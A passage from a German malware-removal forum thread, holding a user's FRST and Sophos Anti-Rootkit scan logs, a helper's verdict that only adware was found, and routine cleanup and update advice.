2014-01-15 20:58 - 2014-01-15 20:58 - 00000400 _____ C:\Users\*****\Desktop\Malwarebytes  Malwarebytes Anti-Rootkit BETA.website
2014-01-15 16:05 - 2014-01-15 16:05 - 00000000 ____D C:\Users\*****\Desktop\ProcessExplorer_1540
2014-01-15 12:08 - 2014-01-15 12:08 - 00001638 _____ C:\Users\*****\Desktop\BU-pst - bald wieder löschen.lnk
2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 10:47 - 2014-01-15 11:04 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 07:24 - 2013-11-27 02:41 - 00343040 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00325120 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2014-01-15 07:24 - 2013-11-27 02:41 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-01-15 07:24 - 2013-11-26 12:40 - 00376768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2014-01-15 07:24 - 2013-11-26 11:32 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService

==================== One Month Modified Files and Folders =======

2014-01-17 07:39 - 2010-12-11 20:50 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-17 07:34 - 2010-12-20 12:28 - 00000000 ____D C:\Users\*****\AppData\Roaming\gSyncit
2014-01-17 07:21 - 2010-12-18 20:23 - 00000000 ____D C:\Users\*****\AppData\Roaming\FileZilla
2014-01-17 07:03 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Dropbox
2014-01-17 06:44 - 2010-07-28 14:21 - 01560187 _____ C:\Windows\WindowsUpdate.log
2014-01-16 20:14 - 2014-01-16 15:08 - 00000000 ____D C:\Users\*****\AppData\Local\VMware
2014-01-16 20:08 - 2014-01-16 15:08 - 00000000 ____D C:\Users\*****\AppData\Roaming\VMware
2014-01-16 19:42 - 2014-01-16 15:06 - 00000000 ____D C:\ProgramData\VMware
2014-01-16 19:41 - 2010-12-11 20:34 - 00269936 _____ C:\Users\*****\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-16 16:33 - 2010-12-11 20:50 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-16 16:32 - 2011-01-06 16:46 - 00269936 _____ C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2014-01-16 15:50 - 2014-01-16 15:50 - 00001166 _____ C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-01-16 15:49 - 2014-01-16 15:48 - 06072408 _____ (TeamViewer GmbH) C:\Users\*****\Downloads\TeamViewer_Setup_de.exe
2014-01-16 15:06 - 2014-01-16 15:06 - 00002124 _____ C:\Users\Public\Desktop\VMware Player.lnk
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files\Common Files\VMware
2014-01-16 15:06 - 2014-01-16 15:06 - 00000000 ____D C:\Program Files (x86)\VMware
2014-01-16 15:06 - 2011-05-18 15:43 - 01650334 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-16 15:06 - 2010-07-26 14:08 - 00703102 _____ C:\Windows\system32\perfh007.dat
2014-01-16 15:06 - 2010-07-26 14:08 - 00150424 _____ C:\Windows\system32\perfc007.dat
2014-01-16 14:42 - 2013-04-19 11:22 - 00002179 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2014-01-16 12:45 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-01-16 12:45 - 2009-07-14 05:45 - 00009920 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-01-16 10:51 - 2014-01-16 10:51 - 00000000 ____D C:\Program Files (x86)\ESET
2014-01-16 10:45 - 2009-07-14 06:13 - 01622100 _____ C:\Windows\system32\PerfStringBackup.INI
2014-01-16 08:22 - 2014-01-16 08:22 - 00000404 _____ C:\Users\*****\Desktop\LAN-Verbindung - Verknüpfung.lnk
2014-01-16 07:21 - 2011-07-14 17:04 - 00000000 ___RD C:\Users\*****\Dropbox
2014-01-16 06:34 - 2009-07-14 06:08 - 00032640 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2014-01-16 06:34 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2014-01-16 06:34 - 2009-07-14 05:51 - 00138261 _____ C:\Windows\setupact.log
2014-01-16 06:33 - 2010-07-28 14:27 - 00000000 ____D C:\ProgramData\NVIDIA
2014-01-16 03:25 - 2009-07-14 05:45 - 01347808 _____ C:\Windows\system32\FNTCACHE.DAT
2014-01-16 03:24 - 2009-11-18 23:09 - 00812778 _____ C:\Windows\PFRO.log
2014-01-16 03:08 - 2009-11-18 22:48 - 00000000 ____D C:\ProgramData\Microsoft Help
2014-01-16 03:04 - 2013-08-17 21:05 - 00000000 ____D C:\Windows\system32\MRT
2014-01-16 03:04 - 2010-12-18 09:40 - 86054176 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-01-15 20:58 - 2014-01-15 20:58 - 00000400 _____ C:\Users\*****\Desktop\Malwarebytes  Malwarebytes Anti-Rootkit BETA.website
2014-01-15 16:05 - 2014-01-15 16:05 - 00000000 ____D C:\Users\*****\Desktop\ProcessExplorer_1540
2014-01-15 12:08 - 2014-01-15 12:08 - 00001638 _____ C:\Users\*****\Desktop\BU-pst - bald wieder löschen.lnk
2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 11:04 - 2014-01-15 10:47 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:42 - 2010-12-11 20:34 - 00000000 ____D C:\Users\*****
2014-01-14 18:38 - 2014-01-14 18:15 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 15:32 - 2013-10-19 19:14 - 00000557 _____ C:\Users\*****\Desktop\moooooovie.txt
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 17:57 - 2013-11-29 20:15 - 00002356 _____ C:\Users\*****\Desktop\kauuuuuuf.txt
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-11 20:33 - 2014-01-11 20:32 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 16:38 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2014-01-10 11:14 - 2009-07-14 03:34 - 00000531 _____ C:\Windows\win.ini
2014-01-09 07:10 - 2012-02-07 11:46 - 00001506 _____ C:\Windows\wininit.ini
2014-01-09 07:10 - 2011-07-14 17:04 - 00001025 _____ C:\Users\*****\Desktop\Dropbox.lnk
2014-01-09 07:10 - 2011-07-14 17:03 - 00000000 ____D C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-01-09 07:10 - 2010-12-11 20:35 - 00000000 ___RD C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2014-01-08 11:13 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:15 - 2013-12-09 14:27 - 00001153 _____ C:\Users\Public\Desktop\FlippingBook Publisher Professional.lnk
2014-01-08 11:14 - 2013-12-09 14:25 - 00000000 __HDC C:\ProgramData\{CA331EC7-0458-49DF-8B26-9E171A9EAE0D}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-05 16:21 - 2011-01-03 16:37 - 00000000 ____D C:\Users\*****\AppData\Roaming\Azureus
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-28 16:39 - 2013-09-01 18:06 - 00000000 ____D C:\Users\Admin\Desktop\test
2013-12-28 16:39 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Mozilla
2013-12-28 16:36 - 2010-12-23 11:42 - 00000000 ____D C:\Users\Admin\AppData\Local\Mozilla
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:57 - 2013-12-28 11:56 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:57 - 2013-12-28 11:53 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-26 18:07 - 2013-09-26 18:33 - 00000000 ____D C:\Users\*****\Desktop\*****
2013-12-19 11:41 - 2009-11-18 22:56 - 00000000 ____D C:\Program Files (x86)\Google

Some content of TEMP:
====================
C:\Users\*****\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-01-09 07:35

==================== End Of Log ============================
         
--- --- ---

--- --- ---


Alt 17.01.2014, 20:41   #6
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Zitat:
Es wurden nur JS/TrojanDownloader.Agent.NSA trojan in den backup files der gehackten websites gefunden (.js). Aber das war mir klar. Ich habe die Zeilen gelöscht, weil zu viele Namen darin vorkommen.
Musste halt löschen

Zitat:
Es bleibt nur die Sorge, ob nicht doch noch jemand auf dem PC ist
woran machst du das fest dass es so sein könnte?
__________________
--> TR/Crypt.Xpack.41536 in der Outlook .pst

Alt 18.01.2014, 16:54   #7
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Zitat:
Es bleibt nur die Sorge, ob nicht doch noch jemand auf dem PC ist
woran machst du das fest dass es so sein könnte?
Damit meine ich nur mein subjektives Gefühl. Das System läuft bestens.

Drei Fragen noch, wenn ich darf
1) War in den Logs am Anfang dieses Beitrags verdächtiges drin?
2) Kann ich noch irgendwelche Tools drüber laufen lassen?
3) Mit was sollte ich USB-Sticks und externe Festplatten scannen, die immer wieder am PC waren?

Ich habe noch Sophos Anti-Rootkit drüber laufen lassen. Hier das sarscan.log:
Code:
ATTFilter
Sophos Anti-Rootkit Version 1.5.0  (c) 2009 Sophos Plc
Started logging on 17.01.2014 at 13:54:56
User "*****" on computer "*****-PC"
Windows version 6.1 SP 1.0 Service Pack 1 build 7601 SM=0x300 PT=0x1 WOW64
Info:	Starting registry scan.
Hidden:	registry item \HKEY_USERS\S-1-5-18\Software\Microsoft\CTF\Assemblies\0x00000409
Hidden:	registry item \HKEY_USERS\S-1-5-18\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
Info:	Starting disk scan of C: (NTFS).
Hidden:	file C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Registration\SetupGREG.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Adobe Flash Player\Install Flash Player 10 ActiveX.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Backup Management Advanced\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\eSobi\eSobiLiteSetup-SAB-204.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Google Toolbar Acer Edition\Installer_v6.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MyWinLocker v3\MyWinLocker.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MyWinLocker v3\program files\EgisTec\MyWinLocker 3\Shredder.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Nero 9 Essentials Acer Edition\unnero.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Welcome Center\SetupOWC.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\MCI Home key (Smart Launcher)\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\SET\Screen saver\Setup.exe
Hidden:	file C:\OEM\Preload\Autorun\SET\SmartLauncher\Setup.exe
Hidden:	file C:\Program Files (x86)\Acer GameZone\Alice Greenfingers\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Amazonia\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dairy Dash\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\DEU\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\ENU\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\FRA\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Dream Day First Home\JPN\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Farm Frenzy 2\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\First Class Flurry\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Granny In Paradise\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Heroes of Hellas\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\Acer GameZone\Merriam Websters Spell Jam\TimeProtect.dll
Hidden:	file C:\Program Files (x86)\InstallShield Installation Information\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}\setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Arcade Deluxe\PCinema\setup.exe
Hidden:	file C:\OEM\Preload\Autorun\APP\Acer Arcade Deluxe\setup.exe
Hidden:	file C:\Windows\System32\config\SOFTWARE.LOG2
Hidden:	file C:\OEM\Preload\Autorun\DRV\nVidia Graphic Card PCI-E Driver\Nvidia_VGA_x64\Display\NvCplSetupInt.exe
Hidden:	file C:\OEM\Preload\Autorun\DRV\nVidia Graphic Card PCI-E Driver\Nvidia_VGA_x86\Display\NvCplSetupInt.exe
Hidden:	file C:\Program Files (x86)\MAGIX\Video_deluxe_15\videodeLuxe.exe
Hidden:	file C:\Users\*****\Downloads\mbar-1.07.0.1008.exe
Hidden:	file C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
Hidden:	file C:\Users\Public\Mediaparts Interactive\FlippingBook Publisher\Updates\Professional_2_5_19_Full.exe
Hidden:	file C:\Program Files (x86)\SWFTools\gpdf2swf.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\FH_FL_Reader_Installer.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\FH_FW_Reader_Installer.exe
Hidden:	file C:\Program Files (x86)\Macromedia\FreeHand MXa\actlib.dll
Hidden:	file C:\Program Files (x86)\Google\Picasa3\Uninstall.exe
Hidden:	file C:\Program Files (x86)\HappyFoto-Designer\Extraction.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\spk\Smab.spk
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\mencoder.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\MPlayer.exe
Hidden:	file C:\Program Files (x86)\eRightSoft\SUPER\mencoder\mplayer\Mplayer.exe
Hidden:	file C:\HS3 Hotelsoftware\HS3Remote.exe
Hidden:	file C:\Program Files (x86)\FlippingBook\FlippingBook Publisher Professional\Resources\VpPrinterSetup.exe
Hidden:	file C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\extensions\printPages2Pdf@reinhold.ripper\libraries\wkhtmltox0.dll
Hidden:	file C:\Program Files (x86)\HappyFoto-Designer\HappyFoto-Designer.exe
Hidden:	file C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}\OFFLINE\D68E83A7\A18896BF\Publisher2.exe
Hidden:	file C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}\OFFLINE\D749CF2B\105CB71E\VpPrinterSetup.exe
Hidden:	file C:\Program Files (x86)\Inkscape\inkscape.com
Hidden:	file C:\Program Files (x86)\Vista Buttons\uninstall.exe
Hidden:	file C:\Program Files (x86)\InstallShield Installation Information\unwintv7.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\Setup.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\Registration\Register.exe
Hidden:	file C:\Hauppauge\WinTV v7 CD 2.5c\WinTV7\WinTV7Setup.exe
Hidden:	file C:\Program Files (x86)\MarkAny\ContentSafer\MPXBox.exe
Hidden:	file C:\Program Files (x86)\Common Files\Samsung\DeviceService\Setup.exe

Stopped logging on 17.01.2014 at 19:30:24
         

Alt 19.01.2014, 10:24   #8
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Zitat:
1) War in den Logs am Anfang dieses Beitrags verdächtiges drin?
nur Adware.
Zitat:
2) Kann ich noch irgendwelche Tools drüber laufen lassen?
nee passt so, nur noch aufräumen
Zitat:
3) Mit was sollte ich USB-Sticks und externe Festplatten scannen, die immer wieder am PC waren?
Mit einem Onlinescanner oder deinem AV Programm.

Log ist sauber.


Fertig

Falls Du Lob oder Kritik loswerden möchtest kannst Du das hier tun


Die Reihenfolge ist hier entscheidend.
  1. Falls Defogger benutzt wurde: Defogger nochmal starten und auf re-enable klicken.
  2. Falls Combofix benutzt wurde: (Alternativ in uninstall.exe umbenennen und starten)
    • Windowstaste + R > Combofix /Uninstall (eingeben) > OK
    • Alternative: Combofix.exe in uninstall.exe umbenennen und starten
    • Combofix wird jetzt starten, sich evtl updaten und dann alle Reste von sich selbst entfernen.
  3. Downloade Dir bitte auf jeden Fall DelFix Download DelFix auf deinen Desktop:
    • Schließe alle offenen Programme.
    • Starte die delfix.exe mit einem Doppelklick.
    • Setze vor jede Funktion ein Häkchen.
    • Klicke auf Start.
    • Hinweis: DelFix entfernt u. a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
    • Starte deinen Rechner abschließend neu.
  4. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein kannst du sie bedenkenlos löschen.


Hier noch ein paar Tipps zur Absicherung deines Systems.


Ich kann garnicht zu oft erwähnen, wie wichtig es ist, dass dein System Up to Date ist.
  • Bitte überprüfe ob dein System Windows Updates automatisch herunter lädt
  • Windows Updates
    • Windows XP: Start --> Systemsteuerung --> Doppelklick auf Automatische Updates
    • Windows Vista / 7: Start --> Systemsteuerung --> System und Sicherheit --> Automatische Updates aktivieren oder deaktivieren
  • Gehe sicher das die automatischen Updates aktiviert sind.
  • Software Updates
    Installierte Software kann ebenfalls Sicherheitslücken haben, welche Malware nutzen kann, um dein System zu infizieren.
